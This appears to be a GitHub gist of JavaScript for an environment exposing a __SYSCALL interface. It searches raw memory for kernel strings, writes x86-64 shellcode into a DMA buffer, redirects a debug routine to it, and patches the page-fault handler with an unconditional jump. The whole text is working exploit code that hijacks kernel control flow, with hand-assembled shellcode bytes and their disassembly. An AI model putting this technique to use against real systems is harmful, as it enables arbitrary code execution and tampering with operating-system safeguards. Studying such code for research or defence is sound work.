console.log("Starting"); | |
function findData(lookFor) { | |
var MEM_START_OFFSET = 1; | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer()); | |
var locs = []; | |
for (var i = 0; i < 0x2000000; i++) { | |
var found = true; | |
for (var j = 0; j < lookFor.length; j++) { | |
if (memBuffer[i+j] != lookFor[j]) { | |
found = false; | |
break; | |
} | |
} | |
if (found) { | |
return (i + MEM_START_OFFSET); | |
} | |
} | |
return null; | |
} | |
function decToHex(d) { | |
var hex = d.toString(16); | |
hex = "00".substr(0, 2 - hex.length) + hex; | |
return hex; | |
} | |
function dumpMem(start, size) { | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer()); | |
var outStr = ""; | |
for (var i = 0; i < size; i++) { | |
outStr += decToHex(memBuffer[i]); | |
} | |
return outStr; | |
} | |
function writeData(writeTo, data) { | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer()); | |
for (var i = 0; i < data.length; i++) { | |
memBuffer[i] = data[i]; | |
} | |
} | |
function writeMultipleData(writeTo, datas) { | |
var offset = 0; | |
for (var i = 0; i < datas.length; i++) { | |
writeData(writeTo + offset, datas[i]); | |
offset += datas[i].length; | |
} | |
} | |
function pointerToBytes(pointer) { | |
var result = []; | |
for (var i = 0; i < 4; i++) { | |
result.push((pointer >> (i*8)) & 0xFF); | |
} | |
return result; | |
} | |
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0))); | |
console.log("Found debug string at: ", dbgStrAddr.toString(16)); | |
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr)); | |
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16)); | |
var codeBuf = __SYSCALL.allocDMA(); | |
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16)); | |
/* | |
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000 | |
7: ff e3 jmp rbx | |
*/ | |
var jmpData = [ | |
[0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address), | |
[0xff, 0xe3] | |
]; | |
writeMultipleData(dbgStrUsageAddr - 5, jmpData); | |
/* | |
0: 48 83 c4 08 add rsp,0x8 | |
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef | |
b: 00 00 00 | |
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678 | |
15: ff e3 jmp rbx | |
*/ | |
var shellcode = [ | |
[0x48, 0x83, 0xc4, 0x08], | |
[0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00], | |
[0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4), | |
[0xff, 0xe3] | |
]; | |
writeMultipleData(codeBuf.address, shellcode); | |
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0))); | |
console.log("Found page fault string at: ", invalidStrAddr.toString(16)); | |
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr)); | |
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16)); | |
// Set unconditional jump in page fault handler | |
writeData(invalidStrUsageAddr - 251, [0xEB]); | |
console.log("Finished writing shellcode"); | |
__SYSCALL.debug(); | |
console.log("Finished calling debug"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment